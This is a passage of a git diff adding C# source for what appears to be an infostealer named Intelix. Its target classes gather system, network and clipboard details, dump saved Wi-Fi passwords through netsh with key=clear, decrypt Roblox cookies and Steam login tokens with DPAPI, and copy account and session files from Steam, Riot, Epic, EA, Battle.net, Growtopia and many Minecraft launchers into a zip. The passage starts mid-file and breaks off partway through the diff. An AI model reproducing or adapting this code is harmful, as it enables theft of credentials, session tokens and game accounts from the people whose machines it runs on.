stringBuilder.ToString().TrimEnd(); + } + + private static string BuildNetworkSection() + { + StringBuilder stringBuilder = new StringBuilder(); + stringBuilder.AppendLine("[Network]"); + stringBuilder.AppendLine("External IP: " + IpApi.GetPublicIp()); + string text = "unavailable"; + string text2 = "unavailable"; + try + { + NetworkInterface[] allNetworkInterfaces = NetworkInterface.GetAllNetworkInterfaces(); + foreach (NetworkInterface networkInterface in allNetworkInterfaces) + { + if (networkInterface.OperationalStatus != OperationalStatus.Up || networkInterface.NetworkInterfaceType == NetworkInterfaceType.Loopback) + { + continue; + } + IPInterfaceProperties iPProperties = networkInterface.GetIPProperties(); + foreach (UnicastIPAddressInformation unicastAddress in iPProperties.UnicastAddresses) + { + if (unicastAddress.Address.AddressFamily == AddressFamily.InterNetwork) + { + text = unicastAddress.Address.ToString(); + break; + } + } + foreach (GatewayIPAddressInformation gatewayAddress in iPProperties.GatewayAddresses) + { + if (gatewayAddress.Address != null && gatewayAddress.Address.AddressFamily == AddressFamily.InterNetwork) + { + text2 = gatewayAddress.Address.ToString(); + break; + } + } + if (text != "unavailable" && text2 != "unavailable") + { + break; + } + } + } + catch + { + } + stringBuilder.AppendLine("Internal IP: " + text); + stringBuilder.AppendLine("Default Gateway: " + text2); + return stringBuilder.ToString().TrimEnd(); + } + + private static string BuildSystemSection() + { + StringBuilder stringBuilder = new StringBuilder(); + stringBuilder.AppendLine("[System]"); + try + { + stringBuilder.AppendLine("OS Product: " + WindowsInfo.GetProductName()); + stringBuilder.AppendLine("OS Build: " + WindowsInfo.GetBuildNumber()); + stringBuilder.AppendLine("OS Arch: " + WindowsInfo.GetArchitecture()); + } + catch + { + stringBuilder.AppendLine("OS: unavailable"); + } + try + { + using RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0"); + string text = (registryKey?.GetValue("ProcessorNameString") as string) ?? (registryKey?.GetValue("VendorIdentifier") as string) ?? "Unknown"; + stringBuilder.AppendLine("CPU Name: " + text); + stringBuilder.AppendLine($"Logical Cores: {Environment.ProcessorCount}"); + } + catch + { + stringBuilder.AppendLine("CPU: unavailable"); + } + try + { + NativeMethods.MEMORYSTATUSEX lpBuffer = new NativeMethods.MEMORYSTATUSEX + { + dwLength = (uint)Marshal.SizeOf(typeof(NativeMethods.MEMORYSTATUSEX)) + }; + if (NativeMethods.GlobalMemoryStatusEx(ref lpBuffer)) + { + ulong num = lpBuffer.ullTotalPhys / 1024 / 1024; + ulong num2 = lpBuffer.ullAvailPhys / 1024 / 1024; + stringBuilder.AppendLine($"RAM Total (MB): {num}"); + stringBuilder.AppendLine($"RAM Available (MB): {num2}"); + } + else + { + stringBuilder.AppendLine("RAM: unavailable"); + } + } + catch + { + stringBuilder.AppendLine("RAM: unavailable"); + } + return stringBuilder.ToString().TrimEnd(); + } + + private static string BuildDrivesSection() + { + StringBuilder stringBuilder = new StringBuilder(); + stringBuilder.AppendLine("[Drives]"); + try + { + List list = (from d in DriveInfo.GetDrives() + where d.IsReady + select d).Select(delegate(DriveInfo d) + { + long num = d.TotalSize / 1024 / 1024 / 1024; + long num2 = d.TotalFreeSpace / 1024 / 1024 / 1024; + return $"{d.Name.TrimEnd('\\')} {d.DriveType} FS:{d.DriveFormat} Size:{num}GB Free:{num2}GB"; + }).ToList(); + if (list.Any()) + { + foreach (string item in list) + { + stringBuilder.AppendLine(item); + } + } + else + { + stringBuilder.AppendLine("No ready drives"); + } + } + catch + { + stringBuilder.AppendLine("Drives: unavailable"); + } + return stringBuilder.ToString().TrimEnd(); + } + + private static string BuildGpuSection() + { + StringBuilder stringBuilder = new StringBuilder(); + stringBuilder.AppendLine("[GPU]"); + try + { + List gpuNames = GetGpuNames(); + if (gpuNames.Any()) + { + foreach (string item in gpuNames) + { + stringBuilder.AppendLine(item); + } + } + else + { + stringBuilder.AppendLine("None"); + } + } + catch + { + stringBuilder.AppendLine("GPUs: unavailable"); + } + return stringBuilder.ToString().TrimEnd(); + } + + private static string BuildBasicSection() + { + StringBuilder stringBuilder = new StringBuilder(); + stringBuilder.AppendLine("[Basic]"); + try + { + stringBuilder.AppendLine("User Domain: " + Environment.UserDomainName); + } + catch + { + stringBuilder.AppendLine("User Domain: unavailable"); + } + try + { + stringBuilder.AppendLine($"CLR Version: {Environment.Version}"); + } + catch + { + stringBuilder.AppendLine("CLR Version: unavailable"); + } + return stringBuilder.ToString().TrimEnd(); + } + + private static string GetClipboardTextNoTimeout() + { + string result = string.Empty; + try + { + Thread thread = new Thread((ThreadStart)delegate + { + try + { + if (Clipboard.ContainsText()) + { + result = Clipboard.GetText(); + } + } + catch + { + } + }); + thread.SetApartmentState(ApartmentState.STA); + thread.IsBackground = true; + thread.Start(); + thread.Join(); + } + catch + { + } + return result ?? string.Empty; + } + + private static List GetGpuNames() + { + List list = new List(); + try + { + uint num = 0u; + NativeMethods.DISPLAY_DEVICE lpDisplayDevice = default(NativeMethods.DISPLAY_DEVICE); + lpDisplayDevice.cb = Marshal.SizeOf(lpDisplayDevice); + while (NativeMethods.EnumDisplayDevices(null, num, ref lpDisplayDevice, 0u)) + { + if (!string.IsNullOrWhiteSpace(lpDisplayDevice.DeviceString)) + { + list.Add(lpDisplayDevice.DeviceString.Trim()); + } + num++; + lpDisplayDevice = new NativeMethods.DISPLAY_DEVICE + { + cb = Marshal.SizeOf(typeof(NativeMethods.DISPLAY_DEVICE)) + }; + } + } + catch + { + } + return list.Distinct().ToList(); + } +} diff --git a/New/Intelix.Targets.Device/WifiKey.cs b/New/Intelix.Targets.Device/WifiKey.cs new file mode 100644 index 0000000..41fa7f5 --- /dev/null +++ b/New/Intelix.Targets.Device/WifiKey.cs @@ -0,0 +1,262 @@ +using System; +using System.Collections.Generic; +using System.Diagnostics; +using System.IO; +using System.Linq; +using System.Text; +using System.Text.RegularExpressions; +using System.Threading.Tasks; +using System.Xml.Linq; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Device; + +public class WifiKey : ITarget +{ + private class WifiInfo + { + public string Profile; + + public string Key; + + public string Authentication; + + public string Cipher; + } + + public void Collect(InMemoryZip zip, Counter counter) + { + WifiInfo[] array = TryExportAndParseProfiles() ?? FallbackParseProfiles(); + if (array != null && array.Length != 0) + { + int num = Math.Max("Profile".Length, MaxLength(array, (WifiInfo r) => r.Profile)); + int num2 = Math.Max("Key".Length, MaxLength(array, (WifiInfo r) => r.Key)); + int num3 = Math.Max("Authentication".Length, MaxLength(array, (WifiInfo r) => r.Authentication)); + int num4 = Math.Max("Cipher".Length, MaxLength(array, (WifiInfo r) => r.Cipher)); + List list = new List(); + list.Add("Profile".PadRight(num) + " | " + "Key".PadRight(num2) + " | " + "Authentication".PadRight(num3) + " | " + "Cipher".PadRight(num4)); + list.Add(new string('-', num + num2 + num3 + num4 + 9)); + List list2 = list; + WifiInfo[] array2 = array; + foreach (WifiInfo wifiInfo in array2) + { + string text = (string.IsNullOrEmpty(wifiInfo.Profile) ? "N/A" : wifiInfo.Profile); + string text2 = (string.IsNullOrEmpty(wifiInfo.Key) ? "Not found" : wifiInfo.Key); + string text3 = (string.IsNullOrEmpty(wifiInfo.Authentication) ? "Not found" : wifiInfo.Authentication); + string text4 = (string.IsNullOrEmpty(wifiInfo.Cipher) ? "Not found" : wifiInfo.Cipher); + list2.Add(text.PadRight(num) + " | " + text2.PadRight(num2) + " | " + text3.PadRight(num3) + " | " + text4.PadRight(num4)); + } + zip.AddTextFile("WifiKeys.txt", string.Join("\n", list2)); + } + } + + private int MaxLength(WifiInfo[] arr, Func selector) + { + if (arr == null || arr.Length == 0) + { + return 0; + } + int num = 0; + for (int i = 0; i < arr.Length; i++) + { + string text = selector(arr[i]) ?? ""; + if (text.Length > num) + { + num = text.Length; + } + } + return num; + } + + private WifiInfo[] TryExportAndParseProfiles() + { + string text = Path.Combine(Path.GetTempPath(), "IntelixWifiExport_" + Guid.NewGuid().ToString("N")); + try + { + Directory.CreateDirectory(text); + } + catch + { + return null; + } + try + { + using (Process process = new Process + { + StartInfo = new ProcessStartInfo + { + FileName = "netsh", + Arguments = "wlan export profile key=clear folder=\"" + text + "\"", + UseShellExecute = false, + RedirectStandardOutput = false, + CreateNoWindow = true + } + }) + { + process.Start(); + process.WaitForExit(5000); + } + string[] array = Directory.EnumerateFiles(text, "*.xml").ToArray(); + if (array.Length == 0) + { + return null; + } + List list = new List(array.Length); + string[] array2 = array; + foreach (string text2 in array2) + { + try + { + XDocument xDocument = XDocument.Load(text2); + string text3 = xDocument.Descendants().FirstOrDefault((XElement e) => string.Equals(e.Name.LocalName, "name", StringComparison.OrdinalIgnoreCase) && e.Parent != null && string.Equals(e.Parent.Name.LocalName, "SSID", StringComparison.OrdinalIgnoreCase))?.Value; + if (string.IsNullOrEmpty(text3)) + { + text3 = Path.GetFileNameWithoutExtension(text2); + } + string text4 = xDocument.Descendants().FirstOrDefault((XElement e) => string.Equals(e.Name.LocalName, "keyMaterial", StringComparison.OrdinalIgnoreCase))?.Value; + string text5 = xDocument.Descendants().FirstOrDefault((XElement e) => string.Equals(e.Name.LocalName, "authentication", StringComparison.OrdinalIgnoreCase))?.Value; + string text6 = xDocument.Descendants().FirstOrDefault((XElement e) => string.Equals(e.Name.LocalName, "encryption", StringComparison.OrdinalIgnoreCase))?.Value; + list.Add(new WifiInfo + { + Profile = (text3 ?? "N/A"), + Key = (string.IsNullOrEmpty(text4) ? "Not found" : text4), + Authentication = (string.IsNullOrEmpty(text5) ? "Not found" : text5), + Cipher = (string.IsNullOrEmpty(text6) ? "Not found" : text6) + }); + } + catch + { + } + } + return list.ToArray(); + } + catch + { + return null; + } + finally + { + try + { + if (Directory.Exists(text)) + { + Directory.Delete(text, recursive: true); + } + } + catch + { + } + } + } + + private WifiInfo[] FallbackParseProfiles() + { + string[] profiles = Profiles(); + if (profiles == null || profiles.Length == 0) + { + return new WifiInfo[0]; + } + WifiInfo[] results = new WifiInfo[profiles.Length]; + Parallel.For(0, profiles.Length, delegate(int i) + { + string text = profiles[i]; + try + { + using Process process = new Process + { + StartInfo = new ProcessStartInfo + { + FileName = "netsh", + Arguments = "wlan show profile name=\"" + text + "\" key=clear", + UseShellExecute = false, + RedirectStandardOutput = true, + CreateNoWindow = true, + StandardOutputEncoding = Encoding.UTF8 + } + }; + process.Start(); + string input = process.StandardOutput.ReadToEnd(); + process.WaitForExit(); + string match = GetMatch(input, "Key Content\\s*:\\s*(.+)"); + string match2 = GetMatch(input, "Authentication\\s*:\\s*(.+)"); + string match3 = GetMatch(input, "Cipher\\s*:\\s*(.+)"); + results[i] = new WifiInfo + { + Profile = text, + Key = (string.IsNullOrEmpty(match) ? "Not found" : match), + Authentication = (string.IsNullOrEmpty(match2) ? "Not found" : match2), + Cipher = (string.IsNullOrEmpty(match3) ? "Not found" : match3) + }; + } + catch + { + results[i] = new WifiInfo + { + Profile = text, + Key = "Error", + Authentication = "Error", + Cipher = "Error" + }; + } + }); + return results; + } + + private string[] Profiles() + { + string[] array2; + try + { + using Process process = new Process + { + StartInfo = new ProcessStartInfo + { + FileName = "netsh", + Arguments = "wlan show profiles", + UseShellExecute = false, + RedirectStandardOutput = true, + CreateNoWindow = true, + StandardOutputEncoding = Encoding.UTF8 + } + }; + process.Start(); + string text = process.StandardOutput.ReadToEnd(); + process.WaitForExit(); + string[] array = text.Split(new char[2] { '\r', '\n' }, StringSplitOptions.RemoveEmptyEntries); + List list = new List(); + array2 = array; + foreach (string text2 in array2) + { + int num = text2.LastIndexOf(':'); + if (num >= 0 && num + 1 < text2.Length) + { + string text3 = text2.Substring(num + 1).Trim(); + if (!string.IsNullOrEmpty(text3)) + { + list.Add(text3); + } + } + } + array2 = list.ToArray(); + } + catch + { + array2 = new string[0]; + } + return array2; + } + + private string GetMatch(string input, string pattern) + { + if (string.IsNullOrEmpty(input)) + { + return string.Empty; + } + Match match = Regex.Match(input, pattern, RegexOptions.IgnoreCase | RegexOptions.Multiline); + if (!match.Success) + { + return string.Empty; + } + return match.Groups[1].Value.Trim(); + } +} diff --git a/New/Intelix.Targets.Games/._BattleNet.cs b/New/Intelix.Targets.Games/._BattleNet.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Games/._BattleNet.cs differ diff --git a/New/Intelix.Targets.Games/._ElectronicArts.cs b/New/Intelix.Targets.Games/._ElectronicArts.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Games/._ElectronicArts.cs differ diff --git a/New/Intelix.Targets.Games/._Epic.cs b/New/Intelix.Targets.Games/._Epic.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Games/._Epic.cs differ diff --git a/New/Intelix.Targets.Games/._Growtopia.cs b/New/Intelix.Targets.Games/._Growtopia.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Games/._Growtopia.cs differ diff --git a/New/Intelix.Targets.Games/._Minecraft.cs b/New/Intelix.Targets.Games/._Minecraft.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Games/._Minecraft.cs differ diff --git a/New/Intelix.Targets.Games/._Riot.cs b/New/Intelix.Targets.Games/._Riot.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Games/._Riot.cs differ diff --git a/New/Intelix.Targets.Games/._Roblox.cs b/New/Intelix.Targets.Games/._Roblox.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Games/._Roblox.cs differ diff --git a/New/Intelix.Targets.Games/._Steam.cs b/New/Intelix.Targets.Games/._Steam.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Games/._Steam.cs differ diff --git a/New/Intelix.Targets.Games/._Uplay.cs b/New/Intelix.Targets.Games/._Uplay.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Games/._Uplay.cs differ diff --git a/New/Intelix.Targets.Games/._XBox.cs b/New/Intelix.Targets.Games/._XBox.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Games/._XBox.cs differ diff --git a/New/Intelix.Targets.Games/BattleNet.cs b/New/Intelix.Targets.Games/BattleNet.cs new file mode 100644 index 0000000..9897678 --- /dev/null +++ b/New/Intelix.Targets.Games/BattleNet.cs @@ -0,0 +1,45 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Games; + +public class BattleNet : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Battle.net"); + if (!Directory.Exists(path)) + { + return; + } + string[] obj = new string[2] { "*.db", "*.config" }; + Counter.CounterApplications counterApplications = new Counter.CounterApplications + { + Name = "BattleNet" + }; + string[] array = obj; + foreach (string searchPattern in array) + { + string[] files = Directory.GetFiles(path, searchPattern, SearchOption.AllDirectories); + foreach (string fileName in files) + { + try + { + FileInfo fileInfo = new FileInfo(fileName); + string text = Path.Combine(Path.Combine("BattleNet", (fileInfo.Directory?.Name == "Battle.net") ? "" : fileInfo.Directory?.Name), fileInfo.Name); + zip.AddFile(text, File.ReadAllBytes(fileInfo.FullName)); + counterApplications.Files.Add(fileInfo.FullName + " => " + text); + } + catch + { + } + } + } + if (counterApplications.Files.Count > 0) + { + counterApplications.Files.Add("BattleNet\\"); + counter.Games.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Games/ElectronicArts.cs b/New/Intelix.Targets.Games/ElectronicArts.cs new file mode 100644 index 0000000..54e6432 --- /dev/null +++ b/New/Intelix.Targets.Games/ElectronicArts.cs @@ -0,0 +1,60 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Games; + +public class ElectronicArts : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Electronic Arts", "EA Desktop", "CEF"); + if (!Directory.Exists(text)) + { + return; + } + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Electronic Arts"; + int num = 0; + string path = Path.Combine(text, "BrowserCache", "EADesktop", "Local Storage", "leveldb"); + if (Directory.Exists(path)) + { + string[] files = Directory.GetFiles(path); + foreach (string text2 in files) + { + try + { + if (string.Equals(Path.GetExtension(text2), ".ldb", StringComparison.OrdinalIgnoreCase)) + { + string text3 = "Electronic Arts\\leveldb\\" + Path.GetFileName(text2); + zip.AddFile(text3, File.ReadAllBytes(text2)); + counterApplications.Files.Add(text2 + " => " + text3); + num++; + } + } + catch + { + } + } + } + string text4 = Path.Combine(text, "BrowserCache", "EADesktop", "Session Storage", "000003.log"); + if (File.Exists(text4)) + { + try + { + string text5 = "Electronic Arts\\Session Storage\\000003.log"; + zip.AddFile(text5, File.ReadAllBytes(text4)); + counterApplications.Files.Add(text4 + " => " + text5); + num++; + } + catch + { + } + } + if (num != 0) + { + counterApplications.Files.Add("Electronic Arts\\"); + counter.Games.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Games/Epic.cs b/New/Intelix.Targets.Games/Epic.cs new file mode 100644 index 0000000..2e5206b --- /dev/null +++ b/New/Intelix.Targets.Games/Epic.cs @@ -0,0 +1,27 @@ +using System; +using System.IO; +using System.Text; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Games; + +public class Epic : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "EpicGamesLauncher", "Saved", "Config", "Windows", "GameUserSettings.ini"); + if (File.Exists(text)) + { + string text2 = File.ReadAllText(text); + if (text2.Contains("[RememberMe]") || text2.Contains("[Offline]")) + { + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Epic Games"; + string text3 = "Epic\\GameUserSettings.ini"; + zip.AddFile(text3, Encoding.UTF8.GetBytes(text2)); + counterApplications.Files.Add(text + " => " + text3); + counter.Games.Add(counterApplications); + } + } + } +} diff --git a/New/Intelix.Targets.Games/Growtopia.cs b/New/Intelix.Targets.Games/Growtopia.cs new file mode 100644 index 0000000..9bb213e --- /dev/null +++ b/New/Intelix.Targets.Games/Growtopia.cs @@ -0,0 +1,22 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Games; + +public class Growtopia : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Growtopia", "save.dat"); + if (File.Exists(text)) + { + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Growtopia"; + string text2 = "Growtopia\\save.dat"; + zip.AddFile(text2, File.ReadAllBytes(text)); + counterApplications.Files.Add(text + " => " + text2); + counter.Games.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Games/Minecraft.cs b/New/Intelix.Targets.Games/Minecraft.cs new file mode 100644 index 0000000..416111e --- /dev/null +++ b/New/Intelix.Targets.Games/Minecraft.cs @@ -0,0 +1,56 @@ +using System; +using System.Collections.Generic; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Games; + +public class Minecraft : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData); + string environmentVariable = Environment.GetEnvironmentVariable("USERPROFILE"); + Dictionary dictionary = new Dictionary(StringComparer.OrdinalIgnoreCase); + dictionary.Add("Intent", Path.Combine(environmentVariable, "intentlauncher", "launcherconfig")); + dictionary.Add("Lunar", Path.Combine(environmentVariable, ".lunarclient", "settings", "game", "accounts.json")); + dictionary.Add("TLauncher", Path.Combine(folderPath, ".minecraft", "TlauncherProfiles.json")); + dictionary.Add("Feather", Path.Combine(folderPath, ".feather", "accounts.json")); + dictionary.Add("Meteor", Path.Combine(folderPath, ".minecraft", "meteor-client", "accounts.nbt")); + dictionary.Add("Impact", Path.Combine(folderPath, ".minecraft", "Impact", "alts.json")); + dictionary.Add("Novoline", Path.Combine(folderPath, ".minecraft", "Novoline", "alts.novo")); + dictionary.Add("CheatBreakers", Path.Combine(folderPath, ".minecraft", "cheatbreaker_accounts.json")); + dictionary.Add("Microsoft Store", Path.Combine(folderPath, ".minecraft", "launcher_accounts_microsoft_store.json")); + dictionary.Add("Rise", Path.Combine(folderPath, ".minecraft", "Rise", "alts.txt")); + dictionary.Add("Rise (Intent)", Path.Combine(environmentVariable, "intentlauncher", "Rise", "alts.txt")); + dictionary.Add("Paladium", Path.Combine(folderPath, "paladium-group", "accounts.json")); + dictionary.Add("PolyMC", Path.Combine(folderPath, "PolyMC", "accounts.json")); + dictionary.Add("Badlion", Path.Combine(folderPath, "Badlion Client", "accounts.json")); + Counter.CounterApplications counterApplications = new Counter.CounterApplications + { + Name = "Minecraft" + }; + foreach (KeyValuePair item in dictionary) + { + if (File.Exists(item.Value)) + { + try + { + string path = Path.Combine("Minecraft", item.Key); + string fileName = Path.GetFileName(item.Value); + string text = Path.Combine(path, fileName); + zip.AddFile(text, File.ReadAllBytes(item.Value)); + counterApplications.Files.Add(item.Value + " => " + text); + } + catch + { + } + } + } + if (counterApplications.Files.Count > 0) + { + counterApplications.Files.Add("Minecraft\\"); + counter.Games.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Games/Riot.cs b/New/Intelix.Targets.Games/Riot.cs new file mode 100644 index 0000000..0736ed7 --- /dev/null +++ b/New/Intelix.Targets.Games/Riot.cs @@ -0,0 +1,22 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Games; + +public class Riot : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Riot Games", "Riot Client", "Data", "RiotGamesPrivateSettings.yaml"); + if (File.Exists(text)) + { + string text2 = Path.Combine("Riot", "RiotGamesPrivateSettings.yaml"); + zip.AddFile(text2, File.ReadAllBytes(text)); + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Riot"; + counterApplications.Files.Add(text + " => " + text2); + counter.Games.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Games/Roblox.cs b/New/Intelix.Targets.Games/Roblox.cs new file mode 100644 index 0000000..b5ae77d --- /dev/null +++ b/New/Intelix.Targets.Games/Roblox.cs @@ -0,0 +1,71 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Text; +using System.Text.RegularExpressions; +using Intelix.Helper.Data; +using Intelix.Helper.Encrypted; + +namespace Intelix.Targets.Games; + +public class Roblox : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Roblox", "LocalStorage", "RobloxCookies.dat"); + if (!File.Exists(text)) + { + return; + } + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Roblox"; + Match match = Regex.Match(File.ReadAllText(text), "\"CookiesData\"\\s*:\\s*\"(.*?)\"", RegexOptions.Singleline); + if (!match.Success) + { + return; + } + byte[] array = DpApi.Decrypt(Convert.FromBase64String(match.Groups[1].Value)); + if (array == null) + { + return; + } + string text2 = "Roblox\\cookies.txt"; + zip.AddTextFile(text2, Encoding.UTF8.GetString(array).Replace("; ", "\n").Replace("#HttpOnly_.roblox.com", ".roblox.com")); + counterApplications.Files.Add(text + " => " + text2); + string text3 = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Roblox", "LocalStorage", "appStorage.json"); + if (!File.Exists(text3)) + { + return; + } + List list = new List(); + string input = File.ReadAllText(text3); + string pattern = "\"(PlayerExeLaunchTime|BrowserTrackerId|UserId|Username|DisplayName|CountryCode)\"\\s*:\\s*\"([^\"]*)\""; + foreach (Match item in Regex.Matches(input, pattern)) + { + string value = item.Groups[1].Value; + string value2 = item.Groups[2].Value; + if (!string.IsNullOrEmpty(value2)) + { + list.Add(value + ": " + value2 + "\n"); + } + } + Match match2 = Regex.Match(input, "\"WebViewUserAgent\"\\s*:\\s*\"([^\"]*)\""); + if (match2.Success) + { + string text4 = "Roblox\\useragent.txt"; + zip.AddTextFile(text4, match2.Groups[1].Value); + counterApplications.Files.Add(text3 + " => " + text4); + } + if (list.Count > 0) + { + string text5 = "Roblox\\information.txt"; + zip.AddTextFile(text5, string.Concat(list)); + counterApplications.Files.Add(text3 + " => " + text5); + } + if (counterApplications.Files.Count > 0) + { + counterApplications.Files.Add("Roblox\\"); + counter.Games.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Games/Steam.cs b/New/Intelix.Targets.Games/Steam.cs new file mode 100644 index 0000000..232be1f --- /dev/null +++ b/New/Intelix.Targets.Games/Steam.cs @@ -0,0 +1,169 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Security.Cryptography; +using System.Text; +using System.Text.RegularExpressions; +using Intelix.Helper.Data; +using Microsoft.Win32; + +namespace Intelix.Targets.Games; + +public class Steam : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Valve\\Steam"); + if (registryKey == null || registryKey.GetValue("SteamPath") == null) + { + return; + } + string text = registryKey.GetValue("SteamPath").ToString(); + if (!Directory.Exists(text)) + { + return; + } + string path = "Steam"; + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Steam"; + try + { + RegistryKey registryKey2 = registryKey.OpenSubKey("Apps"); + if (registryKey2 != null) + { + List list = new List(); + string[] subKeyNames = registryKey2.GetSubKeyNames(); + foreach (string text2 in subKeyNames) + { + using RegistryKey registryKey3 = registryKey.OpenSubKey("Apps\\" + text2); + if (registryKey3 != null) + { + string text3 = (registryKey3.GetValue("Name") as string) ?? "Unknown"; + string text4 = (((int?)registryKey3.GetValue("Installed") == 1) ? "Yes" : "No"); + string text5 = (((int?)registryKey3.GetValue("Running") == 1) ? "Yes" : "No"); + string text6 = (((int?)registryKey3.GetValue("Updating") == 1) ? "Yes" : "No"); + list.Add("Application: " + text3 + "\n\tGameID: " + text2 + "\n\tInstalled: " + text4 + "\n\tRunning: " + text5 + "\n\tUpdating: " + text6); + } + } + if (list.Count > 0) + { + string text7 = Path.Combine(path, "Apps.txt"); + zip.AddTextFile(text7, string.Join("\n\n", list)); + counterApplications.Files.Add("Software\\Valve\\Steam\\Apps => " + text7); + } + } + } + catch + { + } + try + { + string[] subKeyNames = Directory.GetFiles(text); + foreach (string text8 in subKeyNames) + { + if (text8.Contains("ssfn")) + { + byte[] content = File.ReadAllBytes(text8); + string text9 = Path.Combine(path, "ssfn", Path.GetFileName(text8)); + zip.AddFile(text9, content); + counterApplications.Files.Add(text8 + " => " + text9); + } + } + } + catch + { + } + try + { + string path2 = Path.Combine(text, "config"); + if (Directory.Exists(path2)) + { + string[] subKeyNames = Directory.GetFiles(path2, "*.vdf"); + foreach (string text10 in subKeyNames) + { + string text11 = Path.Combine(path, "configs", Path.GetFileName(text10)); + zip.AddFile(text11, File.ReadAllBytes(text10)); + counterApplications.Files.Add(text10 + " => " + text11); + } + } + } + catch + { + } + try + { + string text12 = registryKey.GetValue("AutoLoginUser")?.ToString() ?? "Unknown"; + string text13 = (((int?)registryKey.GetValue("RememberPassword") == 1) ? "Yes" : "No"); + string text14 = "Autologin User: " + text12 + "\nRemember password: " + text13; + string text15 = Path.Combine(path, "SteamInfo.txt"); + zip.AddTextFile(text15, text14); + counterApplications.Files.Add("Software\\Valve\\Steam => " + text15); + } + catch + { + } + try + { + string[] source = new string[2] + { + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Steam", "local.vdf"), + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Steam", "local.vdf") + }; + string[] source2 = new string[2] + { + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFilesX86), "Steam", "config", "loginusers.vdf"), + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Steam", "config", "loginusers.vdf") + }; + string text16 = source.FirstOrDefault(File.Exists); + string text17 = source2.FirstOrDefault(File.Exists); + if (text16 == null || text17 == null) + { + return; + } + string pattern = "\"AccountName\"\\s*\"([^\"]+)\""; + string pattern2 = "([a-fA-F0-9]{500,2000})"; + MatchCollection matchCollection = Regex.Matches(File.ReadAllText(text17), pattern); + MatchCollection matchCollection2 = Regex.Matches(File.ReadAllText(text16), pattern2); + if (matchCollection.Count == 0 || matchCollection2.Count == 0) + { + return; + } + List list2 = new List(); + foreach (Match item in matchCollection) + { + byte[] bytes = Encoding.UTF8.GetBytes(item.Groups[1].Value); + foreach (Match tokenMatch in matchCollection2) + { + byte[] encryptedData = (from x in Enumerable.Range(0, tokenMatch.Value.Length / 2) + select Convert.ToByte(tokenMatch.Value.Substring(x * 2, 2), 16)).ToArray(); + try + { + byte[] bytes2 = ProtectedData.Unprotect(encryptedData, bytes, DataProtectionScope.LocalMachine); + list2.Add(Encoding.UTF8.GetString(bytes2)); + } + catch + { + continue; + } + break; + } + } + if (list2.Count > 0) + { + string text18 = Path.Combine(path, "Token.txt"); + zip.AddTextFile(text18, string.Join("\n", list2)); + counterApplications.Files.Add(text16 + " => " + text18); + counterApplications.Files.Add(text17 + " => " + text18); + } + } + catch + { + } + if (counterApplications.Files.Count > 0) + { + counterApplications.Files.Add("Steam\\"); + counter.Games.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Games/Uplay.cs b/New/Intelix.Targets.Games/Uplay.cs new 